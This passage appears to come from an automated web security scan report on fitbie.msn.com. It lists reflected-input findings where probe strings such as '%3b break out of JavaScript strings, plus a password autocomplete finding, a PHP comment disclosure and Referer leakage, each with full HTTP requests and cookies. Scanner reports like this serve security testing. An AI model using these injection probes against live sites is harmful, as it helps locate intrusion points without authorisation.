<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/small-changes-big-resultsc49d2';21edd9f2902?destination=node%2Fsmall-changes-big-resultsc49d2';21edd9f2902&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.129. http://fitbie.msn.com/workout/transform-your-body-strength-workout-d [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/workout/transform-your-body-strength-workout-d

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38714'%3b268f0884796 was submitted in the REST URL parameter 2. This input was echoed as 38714';268f0884796 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /workout/transform-your-body-strength-workout-d38714'%3b268f0884796 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:33 +0000
ETag: "1297607793-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:34 GMT
Date: Sun, 13 Feb 2011 14:36:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/transform-your-body-strength-workout-d38714';268f0884796?destination=node%2Ftransform-your-body-strength-workout-d38714';268f0884796&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.130. http://fitbie.msn.com/workout/transform-your-body-strength-workout-e [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/workout/transform-your-body-strength-workout-e

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d4b'%3bd7ab09fe9c9 was submitted in the REST URL parameter 2. This input was echoed as 72d4b';d7ab09fe9c9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /workout/transform-your-body-strength-workout-e72d4b'%3bd7ab09fe9c9 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:12 +0000
ETag: "1297607772-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3599
Expires: Sun, 13 Feb 2011 15:36:12 GMT
Date: Sun, 13 Feb 2011 14:36:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/transform-your-body-strength-workout-e72d4b';d7ab09fe9c9?destination=node%2Ftransform-your-body-strength-workout-e72d4b';d7ab09fe9c9&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.131. http://fitbie.msn.com/workout/transform-your-body-strength-workout-f [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/workout/transform-your-body-strength-workout-f

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48d08'%3bd8903582cfc was submitted in the REST URL parameter 2. This input was echoed as 48d08';d8903582cfc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /workout/transform-your-body-strength-workout-f48d08'%3bd8903582cfc HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:08 +0000
ETag: "1297607768-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:08 GMT
Date: Sun, 13 Feb 2011 14:36:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/transform-your-body-strength-workout-f48d08';d8903582cfc?destination=node%2Ftransform-your-body-strength-workout-f48d08';d8903582cfc&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.132. http://fitbie.msn.com/workout/your-instant-beach-body [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/workout/your-instant-beach-body

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9470f'%3be07032cc0e1 was submitted in the REST URL parameter 2. This input was echoed as 9470f';e07032cc0e1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /workout/your-instant-beach-body9470f'%3be07032cc0e1 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:55 +0000
ETag: "1297607755-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:56 GMT
Date: Sun, 13 Feb 2011 14:35:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/your-instant-beach-body9470f';e07032cc0e1?destination=node%2Fyour-instant-beach-body9470f';e07032cc0e1&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.133. http://fitbie.msn.com/workouts-men/trimming-tools [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/workouts-men/trimming-tools

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc0b1'%3b2f9124a58e9 was submitted in the REST URL parameter 2. This input was echoed as bc0b1';2f9124a58e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /workouts-men/trimming-toolsbc0b1'%3b2f9124a58e9 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:37:51 +0000
ETag: "1297607871-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:37:52 GMT
Date: Sun, 13 Feb 2011 14:37:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/trimming-toolsbc0b1';2f9124a58e9?destination=node%2Ftrimming-toolsbc0b1';2f9124a58e9&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

2. Password field with autocomplete enabled previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/logout

Issue detail

The page contains a form with the following action URL:

https://mc.fitbie.msn.com/user

The form contains the following password field with autocomplete enabled:

pass

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /logout HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 403 Forbidden
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:55 +0000
ETag: "1297607815-1"
Content-Type: text/html; charset=utf-8
Expires: Sun, 13 Feb 2011 14:36:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:36:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<form action="https://mc.fitbie.msn.com/user" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
<div class="description">
...[SNIP]...

3. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://fitbie.msn.com
Path:	/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET / HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; fsbrelated=%3Ca%20href%3D%22/slideshow/5-ways-do-anything-better%22%20title%3D%225%20Ways%20to%20Do%20Anything%20Better%22%3E5%20Ways%20to%20Do%20Anything%20Better%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/5-ways-do-anything-better%22%3E%3Cimg%20src%3D%22/sites/default/files/beet-roots-cutting-board-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-ways-lose-weight-naturally-before-your-wedding%22%20title%3D%226%20Ways%20to%20Lose%20Weight%20Naturally%20Before%20Your%20Wedding%22%3E6%20Ways%20to%20Lose%20Weight%20Naturally%20Before...%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-ways-lose-weight-naturally-before-your-wedding%22%3E%3Cimg%20src%3D%22/sites/default/files/bride-slim-healthy-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-lamest-excuses-not-losing-weight%22%20title%3D%226%20Lamest%20Excuses%20for%20Not%20Losing%20Weight%22%3E6%20Lamest%20Excuses%20for%20Not%20Losing%20Weight%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-lamest-excuses-not-losing-weight%22%3E%3Cimg%20src%3D%22/sites/default/files/guilty-chocolate-snack-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/8-ridiculously-cheap-healthy-foods%22%20title%3D%228%20Ridiculously%20Cheap%20Healthy%20Foods%22%3E8%20Ridiculously%20Cheap%20Healthy%20Foods%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-ridiculously-cheap-healthy-foods%22%3E%3Cimg%20src%3D%22/sites/default/files/potatoes-assorted-th.jpg%22%20/%3E%3C/a%3E; _HOP=I=1&TS=1297606884; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297577225-1"
Last-Modified: Sun, 13 Feb 2011 06:07:05 +0000
Content-Type: text/html; charset=utf-8
Date: Sun, 13 Feb 2011 14:22:18 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 66330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div class="panel-wrap-top clear-block">
<?php// print_r($content);?>
<div class="panel-panel panel-top-left">
...[SNIP]...

4. Cross-domain Referer leakage previous next
There are 5 instances of this issue:

/get-fit/anytime-anywhere-yoga
/slideshow/12-ways-make-water-less-boring
/slideshow/why-being-single-better-your-body
/videos
/videos/

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

4.1. http://fitbie.msn.com/get-fit/anytime-anywhere-yoga previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/anytime-anywhere-yoga

Issue detail

The page was loaded from a URL containing a query string:

http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/fitbie/getfit;topic=yoga;sbtpc=anytimeanywhereyoga;tile=1;sz=300x250;ord=123456?
http://ad.doubleclick.net/jump/fitbie/getfit;kw=;slot=300x250.1;topic=yoga;sbtpc=anytimeanywhereyoga;tile=1;sz=300x250;ord=123456?
http://advertising.microsoft.com/msn/
